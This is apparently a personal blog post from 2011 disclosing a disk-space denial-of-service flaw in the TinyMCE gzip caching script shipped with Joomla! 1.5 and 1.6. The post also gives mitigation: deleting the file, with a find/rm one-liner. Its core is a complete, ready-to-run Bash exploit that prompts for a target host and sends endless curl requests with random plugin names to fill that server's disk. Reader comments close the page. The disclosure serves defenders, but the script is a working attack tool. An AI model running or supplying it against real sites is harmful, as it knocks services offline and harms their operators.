Tuesday, 05 April 2011 10:23

Back in February, I reported an issue with TinyMCE to the Joomla! Security Strike Team. Since then, they "fixed" it in 1.6.1, but failed to do so for 1.5.23. Joomla! 1.5.x ships with a script that is supposed to cache gzipped copies of TinyMCE, but not only is this script never used, but it doesn't clean up after itself.

Without further ado, here is a POC Bash script that causes denial of service:

#!/bin/bash
# Exploit Title: Joomla! 1.5/1.6 TinyMCE Disk Space DOS
# Date: 25 February 2010
# Author: Jeff Channell
# Software Link: http://www.joomla.org
 
# header
clear
echo "###################################################"
echo "##  Joomla! 1.5.23/1.6.0 TinyMCE Disk Space DOS  ##"
echo "##       2011 jdc - for educational use only     ##"
echo "###################################################"
echo ""
echo -n "Host: http://"
read MCEDOS_JOOMLAHOST
echo ""
echo -n "1.5 Mode? y/n: "
read MCEDOS_OLDJOOMLA
 
MCEDOS_PART="media"
if [ "$MCEDOS_OLDJOOMLA" == "y" ]
then
  MCEDOS_PART="plugins"
fi
 
MCEDOS_USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
MCEDOS_ROOT_PATH="http://$MCEDOS_JOOMLAHOST/$MCEDOS_PART/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins="
 
echo ""
echo " * Filling up the drive of $MCEDOS_JOOMLAHOST ... Ctrl+C to quit"
echo ""
echo ""
 
while [ true ]; do
  MCEDOS_RANDOM=`date | md5sum | sed -e s/[^0-9a-f]//g`
  curl -H 'Accept-Encoding: gzip,deflate' -A "$MCEDOS_USERAGENT" "$MCEDOS_ROOT_PATH$MCEDOS_RANDOM" > /dev/null 2>&1 &
  echo -n "."
  sleep 1
done
 
 
 

Joomla! 1.5.x users can protect themselves by deleting plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php (thanks to Amy Stephen for the suggestion).

UPDATE: Those with shell but no shell-fu might find this helpful as well: find . -type f -name tiny_mce_gzip.php -exec rm {} \;

Last Updated on Tuesday, 05 April 2011 11:15
 
Comments (2)
1 Thursday, 26 May 2011 16:05
towenware
Thanx !
Total novice here, but am sensitive regarding security. Setting up a Joomla! site soon.

BTW, where might I get a cool wavy captcha like you're using here in your comments section?
2 Saturday, 10 December 2011 13:19
PhilD
File still exists in 1.5.25, I assume issue still exists?

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

Featured Extensions

$1.00
FREE
You Save: $1.00
$25.00
$3.00
FREE
You Save: $3.00
FREE

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions